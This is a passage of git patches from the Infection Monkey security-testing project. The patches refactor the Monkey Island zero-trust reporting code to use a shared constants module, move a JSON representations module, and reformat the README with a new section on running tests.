+9,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_grades(): pillars_grades = [] - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: pillars_grades.append(ZeroTrustService.__get_pillar_grade(pillar)) return pillars_grades @@ -19,13 +18,13 @@ class ZeroTrustService(object): all_findings = Finding.objects() pillar_grade = { "pillar": pillar, - STATUS_FAILED: 0, - STATUS_VERIFY: 0, - STATUS_PASSED: 0, - STATUS_UNEXECUTED: 0 + zero_trust_consts.STATUS_FAILED: 0, + zero_trust_consts.STATUS_VERIFY: 0, + zero_trust_consts.STATUS_PASSED: 0, + zero_trust_consts.STATUS_UNEXECUTED: 0 } - tests_of_this_pillar = PILLARS_TO_TESTS[pillar] + tests_of_this_pillar = zero_trust_consts.PILLARS_TO_TESTS[pillar] test_unexecuted = {} for test in tests_of_this_pillar: @@ -33,11 +32,11 @@ class ZeroTrustService(object): for finding in all_findings: test_unexecuted[finding.test] = False - test_info = TESTS_MAP[finding.test] - if pillar in test_info[PILLARS_KEY]: + test_info = zero_trust_consts.TESTS_MAP[finding.test] + if pillar in test_info[zero_trust_consts.PILLARS_KEY]: pillar_grade[finding.status] += 1 - pillar_grade[STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) + pillar_grade[zero_trust_consts.STATUS_UNEXECUTED] = sum(1 for condition in list(test_unexecuted.values()) if condition) return pillar_grade @@ -46,14 +45,14 @@ class ZeroTrustService(object): all_principles_statuses = {} # init with empty lists - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: all_principles_statuses[pillar] = [] - for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()): - for pillar in PRINCIPLES_TO_PILLARS[principle]: + for principle, principle_tests in list(zero_trust_consts.PRINCIPLES_TO_TESTS.items()): + for pillar in zero_trust_consts.PRINCIPLES_TO_PILLARS[principle]: all_principles_statuses[pillar].append( { - "principle": PRINCIPLES[principle], + "principle": zero_trust_consts.PRINCIPLES[principle], "tests": ZeroTrustService.__get_tests_status(principle_tests), "status": ZeroTrustService.__get_principle_status(principle_tests) } @@ -63,13 +62,13 @@ class ZeroTrustService(object): @staticmethod def __get_principle_status(principle_tests): - worst_status = STATUS_UNEXECUTED + worst_status = zero_trust_consts.STATUS_UNEXECUTED all_statuses = set() for test in principle_tests: all_statuses |= set(Finding.objects(test=test).distinct("status")) for status in all_statuses: - if ORDERED_TEST_STATUSES.index(status) < ORDERED_TEST_STATUSES.index(worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(worst_status): worst_status = status return worst_status @@ -81,7 +80,7 @@ class ZeroTrustService(object): test_findings = Finding.objects(test=test) results.append( { - "test": TESTS_MAP[test][TEST_EXPLANATION_KEY], + "test": zero_trust_consts.TESTS_MAP[test][zero_trust_consts.TEST_EXPLANATION_KEY], "status": ZeroTrustService.__get_lcd_worst_status_for_test(test_findings) } ) @@ -94,9 +93,9 @@ class ZeroTrustService(object): :return: the "worst" (i.e. most severe) status out of the given findings. lcd stands for lowest common denominator. """ - current_worst_status = STATUS_UNEXECUTED + current_worst_status = zero_trust_consts.STATUS_UNEXECUTED for finding in all_findings_for_test: - if ORDERED_TEST_STATUSES.index(finding.status) < ORDERED_TEST_STATUSES.index(current_worst_status): + if zero_trust_consts.ORDERED_TEST_STATUSES.index(finding.status) < zero_trust_consts.ORDERED_TEST_STATUSES.index(current_worst_status): current_worst_status = finding.status return current_worst_status @@ -109,11 +108,11 @@ class ZeroTrustService(object): @staticmethod def __get_enriched_finding(finding): - test_info = TESTS_MAP[finding.test] + test_info = zero_trust_consts.TESTS_MAP[finding.test] enriched_finding = { - "test": test_info[FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], + "test": test_info[zero_trust_consts.FINDING_EXPLANATION_BY_STATUS_KEY][finding.status], "test_key": finding.test, - "pillars": test_info[PILLARS_KEY], + "pillars": test_info[zero_trust_consts.PILLARS_KEY], "status": finding.status, "events": ZeroTrustService.__get_events_as_dict(finding.events) } @@ -126,12 +125,12 @@ class ZeroTrustService(object): @staticmethod def get_statuses_to_pillars(): results = { - STATUS_FAILED: [], - STATUS_VERIFY: [], - STATUS_PASSED: [], - STATUS_UNEXECUTED: [] + zero_trust_consts.STATUS_FAILED: [], + zero_trust_consts.STATUS_VERIFY: [], + zero_trust_consts.STATUS_PASSED: [], + zero_trust_consts.STATUS_UNEXECUTED: [] } - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[ZeroTrustService.__get_status_of_single_pillar(pillar)].append(pillar) return results @@ -139,7 +138,7 @@ class ZeroTrustService(object): @staticmethod def get_pillars_to_statuses(): results = {} - for pillar in PILLARS: + for pillar in zero_trust_consts.PILLARS: results[pillar] = ZeroTrustService.__get_status_of_single_pillar(pillar) return results @@ -147,7 +146,7 @@ class ZeroTrustService(object): @staticmethod def __get_status_of_single_pillar(pillar): grade = ZeroTrustService.__get_pillar_grade(pillar) - for status in ORDERED_TEST_STATUSES: + for status in zero_trust_consts.ORDERED_TEST_STATUSES: if grade[status] > 0: return status - return STATUS_UNEXECUTED + return zero_trust_consts.STATUS_UNEXECUTED diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py index db5b6445d..ddc1af65b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/antivirus_existence.py @@ -1,7 +1,6 @@ import json -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_LOCAL, \ - STATUS_PASSED, STATUS_FAILED, TEST_ENDPOINT_SECURITY_EXISTS +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -14,7 +13,7 @@ def test_antivirus_existence(telemetry_json): process_list_event = Event.create_event( title="Process list", message="Monkey on {} scanned the process list".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_LOCAL) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL) events = [process_list_event] av_processes = filter_av_processes(telemetry_json) @@ -24,15 +23,15 @@ def test_antivirus_existence(telemetry_json): title="Found AV process", message="The process '{}' was recognized as an Anti Virus process. Process " "details: {}".format(process[1]['name'], json.dumps(process[1])), - event_type=EVENT_TYPE_MONKEY_LOCAL + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_LOCAL )) if len(av_processes) > 0: - test_status = STATUS_PASSED + test_status = zero_trust_consts.STATUS_PASSED else: - test_status = STATUS_FAILED + test_status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events + test=zero_trust_consts.TEST_ENDPOINT_SECURITY_EXISTS, status=test_status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py index 6c5b1154b..f6af5e4bf 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/communicate_as_new_user.py @@ -1,5 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_COMMUNICATE_AS_NEW_USER, \ - STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding from monkey_island.cc.models.zero_trust.event import Event @@ -10,9 +9,9 @@ COMM_AS_NEW_USER_SUCCEEDED_FORMAT = \ def test_new_user_communication(current_monkey, success, message): AggregateFinding.create_or_add_to_existing( - test=TEST_COMMUNICATE_AS_NEW_USER, + test=zero_trust_consts.TEST_COMMUNICATE_AS_NEW_USER, # If the monkey succeeded to create a user, then the test failed. - status=STATUS_FAILED if success else STATUS_PASSED, + status=zero_trust_consts.STATUS_FAILED if success else zero_trust_consts.STATUS_PASSED, events=[ get_attempt_event(current_monkey), get_result_event(current_monkey, message, success) @@ -24,7 +23,7 @@ def get_attempt_event(current_monkey): tried_to_communicate_event = Event.create_event( title="Communicate as new user", message="Monkey on {} tried to create a new user and communicate from it.".format(current_monkey.hostname), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) return tried_to_communicate_event @@ -34,4 +33,4 @@ def get_result_event(current_monkey, message, success): return Event.create_event( title="Communicate as new user", message=message_format.format(current_monkey.hostname, message), - event_type=EVENT_TYPE_MONKEY_NETWORK) + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py index e6afcf088..d7b447e4a 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/data_endpoints.py @@ -1,8 +1,7 @@ import json from common.data.network_consts import ES_SERVICE -from common.data.zero_trust_consts import STATUS_PASSED, EVENT_TYPE_MONKEY_NETWORK, STATUS_FAILED, TEST_DATA_ENDPOINT_HTTP, \ - TEST_DATA_ENDPOINT_ELASTIC +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -13,8 +12,8 @@ HTTP_SERVERS_SERVICES_NAMES = ['tcp-80'] def test_open_data_endpoints(telemetry_json): services = telemetry_json["data"]["machine"]["services"] current_monkey = Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']) - found_http_server_status = STATUS_PASSED - found_elastic_search_server = STATUS_PASSED + found_http_server_status = zero_trust_consts.STATUS_PASSED + found_elastic_search_server = zero_trust_consts.STATUS_PASSED events = [ Event.create_event( @@ -22,7 +21,7 @@ def test_open_data_endpoints(telemetry_json): message="Monkey on {} tried to perform a network scan, the target was {}.".format( current_monkey.hostname, telemetry_json["data"]["machine"]["ip_addr"]), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=telemetry_json["timestamp"] ) ] @@ -31,10 +30,10 @@ def test_open_data_endpoints(telemetry_json): events.append(Event.create_event( title="Scan telemetry analysis", message="Scanned service: {}.".format(service_name), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name in HTTP_SERVERS_SERVICES_NAMES: - found_http_server_status = STATUS_FAILED + found_http_server_status = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -42,10 +41,10 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) if service_name == ES_SERVICE: - found_elastic_search_server = STATUS_FAILED + found_elastic_search_server = zero_trust_consts.STATUS_FAILED events.append(Event.create_event( title="Scan telemetry analysis", message="Service {} on {} recognized as an open data endpoint! Service details: {}".format( @@ -53,17 +52,17 @@ def test_open_data_endpoints(telemetry_json): telemetry_json["data"]["machine"]["ip_addr"], json.dumps(service_data) ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK )) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_HTTP, + test=zero_trust_consts.TEST_DATA_ENDPOINT_HTTP, status=found_http_server_status, events=events ) AggregateFinding.create_or_add_to_existing( - test=TEST_DATA_ENDPOINT_ELASTIC, + test=zero_trust_consts.TEST_DATA_ENDPOINT_ELASTIC, status=found_elastic_search_server, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py index fe0015576..8c128e7f9 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/machine_exploited.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED, STATUS_FAILED, TEST_MACHINE_EXPLOITED +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -11,11 +11,11 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp ) ] - status = STATUS_PASSED + status = zero_trust_consts.STATUS_PASSED if exploit_successful: events.append( Event.create_event( @@ -24,13 +24,13 @@ def test_machine_exploited(current_monkey, exploit_successful, exploiter, target current_monkey.hostname, target_ip, exploiter), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=timestamp) ) - status = STATUS_FAILED + status = zero_trust_consts.STATUS_FAILED AggregateFinding.create_or_add_to_existing( - test=TEST_MACHINE_EXPLOITED, + test=zero_trust_consts.TEST_MACHINE_EXPLOITED, status=status, events=events ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py index 626a4cc52..f2c3f61b6 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/segmentation.py @@ -1,6 +1,6 @@ import itertools -from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK, STATUS_PASSED +import common.data.zero_trust_consts as zero_trust_consts from common.network.network_range import NetworkRange from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst, get_ip_if_in_subnet from monkey_island.cc.models import Monkey @@ -28,7 +28,7 @@ def test_segmentation_violation(current_monkey, target_ip): event = get_segmentation_violation_event(current_monkey, source_subnet, target_ip, target_subnet) SegmentationFinding.create_or_add_to_existing_finding( subnets=[source_subnet, target_subnet], - status=STATUS_FAILED, + status=zero_trust_consts.STATUS_FAILED, segmentation_event=event ) @@ -66,7 +66,7 @@ def get_segmentation_violation_event(current_monkey, source_subnet, target_ip, t target_ip=target_ip, target_seg=target_subnet ), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) @@ -92,7 +92,7 @@ def create_or_add_findings_for_all_pairs(all_subnets, current_monkey): for subnet_pair in all_subnets_pairs_for_this_monkey: SegmentationFinding.create_or_add_to_existing_finding( subnets=list(subnet_pair), - status=STATUS_PASSED, + status=zero_trust_consts.STATUS_PASSED, segmentation_event=get_segmentation_done_event(current_monkey, subnet_pair) ) @@ -104,5 +104,5 @@ def get_segmentation_done_event(current_monkey, subnet_pair): hostname=current_monkey.hostname, src_seg=subnet_pair[0], dst_seg=subnet_pair[1]), - event_type=EVENT_TYPE_MONKEY_NETWORK + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK ) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py index 900ac2f89..50d5f1c0b 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/test_segmentation_zt_tests.py @@ -1,7 +1,6 @@ import uuid -from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_PASSED, STATUS_FAILED, \ - EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.event import Event from monkey_island.cc.models.zero_trust.finding import Finding @@ -26,21 +25,29 @@ class TestSegmentationTests(IslandTestCase): ip_addresses=[FIRST_SUBNET]) # no findings - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 0) + self.assertEqual(len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), 0) # This is like the monkey is done and sent done telem create_or_add_findings_for_all_pairs(all_subnets, monkey) # There are 2 subnets in which the monkey is NOT - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 2) # This is a monkey from 2nd subnet communicated with 1st subnet. SegmentationFinding.create_or_add_to_existing_finding( [FIRST_SUBNET, SECOND_SUBNET], - STATUS_FAILED, - Event.create_event(title="sdf", message="asd", event_type=EVENT_TYPE_MONKEY_NETWORK) + zero_trust_consts.STATUS_FAILED, + Event.create_event(title="sdf", message="asd", event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK) ) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_PASSED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION, status=STATUS_FAILED)), 1) - self.assertEqual(len(Finding.objects(test=TEST_SEGMENTATION)), 2) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_PASSED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION, status=zero_trust_consts.STATUS_FAILED)), + 1) + self.assertEqual( + len(Finding.objects(test=zero_trust_consts.TEST_SEGMENTATION)), + 2) diff --git a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py index ce34c2bb4..e402525c8 100644 --- a/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py +++ b/monkey/monkey_island/cc/services/telemetry/zero_trust_tests/tunneling.py @@ -1,4 +1,4 @@ -from common.data.zero_trust_consts import TEST_TUNNELING, STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK +import common.data.zero_trust_consts as zero_trust_consts from monkey_island.cc.models import Monkey from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding, add_malicious_activity_to_timeline from monkey_island.cc.models.zero_trust.event import Event @@ -14,13 +14,13 @@ def test_tunneling_violation(tunnel_telemetry_json): title="Tunneling event", message="Monkey on {hostname} tunneled traffic through {proxy}.".format( hostname=current_monkey.hostname, proxy=tunnel_host_ip), - event_type=EVENT_TYPE_MONKEY_NETWORK, + event_type=zero_trust_consts.EVENT_TYPE_MONKEY_NETWORK, timestamp=tunnel_telemetry_json['timestamp'] )] AggregateFinding.create_or_add_to_existing( - test=TEST_TUNNELING, - status=STATUS_FAILED, + test=zero_trust_consts.TEST_TUNNELING, + status=zero_trust_consts.STATUS_FAILED, events=tunneling_events ) From bcf2d964d767a9c383fcf499aaad2cb8e8b940f2 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Mon, 4 Nov 2019 11:44:25 +0200 Subject: [PATCH 43/44] Moved representations to services --- monkey/monkey_island/cc/app.py | 8 ++++---- .../cc/{resources => services}/representations.py | 0 .../cc/{resources => services}/representations_test.py | 2 +- 3 files changed, 5 insertions(+), 5 deletions(-) rename monkey/monkey_island/cc/{resources => services}/representations.py (100%) rename monkey/monkey_island/cc/{resources => services}/representations_test.py (95%) diff --git a/monkey/monkey_island/cc/app.py b/monkey/monkey_island/cc/app.py index 9b5e7b849..be2430dda 100644 --- a/monkey/monkey_island/cc/app.py +++ b/monkey/monkey_island/cc/app.py @@ -21,18 +21,18 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report -from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed from monkey_island.cc.resources.pba_file_download import PBAFileDownload from monkey_island.cc.resources.version_update import VersionUpdate -from monkey_island.cc.services.database import Database -from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH -from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.attack.attack_config import AttackConfiguration from monkey_island.cc.resources.attack.attack_report import AttackReport +from monkey_island.cc.services.database import Database +from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService +from monkey_island.cc.services.representations import output_json +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.resources.test.monkey_test import MonkeyTest from monkey_island.cc.resources.test.log_test import LogTest diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/services/representations.py similarity index 100% rename from monkey/monkey_island/cc/resources/representations.py rename to monkey/monkey_island/cc/services/representations.py diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py similarity index 95% rename from monkey/monkey_island/cc/resources/representations_test.py rename to monkey/monkey_island/cc/services/representations_test.py index c50394117..d6c7f99d7 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -1,6 +1,6 @@ from unittest import TestCase from datetime import datetime -from .representations import normalize_obj +from monkey_island.cc.services.representations import normalize_obj import bson From c68ea48b0b8f08044753abc19858b387292472cd Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 10:19:39 +0200 Subject: [PATCH 44/44] Added unit tests guide to the readme. --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 2d7490bfe..dd1d7982b 100644 --- a/README.md +++ b/README.md @@ -1,31 +1,27 @@ -Infection Monkey -==================== +# Infection Monkey [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases) ![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey) ![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey) ## Data center Security Testing Tool ------------------------- Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. - + The Infection Monkey is comprised of two parts: * Monkey - A tool which infects other machines and propagates to them * Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com -Main Features ---------------- - +## Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. * Multiple propagation techniques: @@ -41,15 +37,13 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SambaCry * Elastic Search (CVE-2015-1427) -Setup -------------------------------- +## Setup Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/). The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility). -Building the Monkey from source -------------------------------- +## Building the Monkey from source To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder. If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself) and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island). @@ -61,8 +55,14 @@ and follow the instructions at the readme files under [infection_monkey](infecti | Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) | | Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) | -License -======= +## Tests +### Unit Tests +In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory. + +### Blackbox tests +In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`. + +# License Copyright (c) Guardicore Ltd See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3).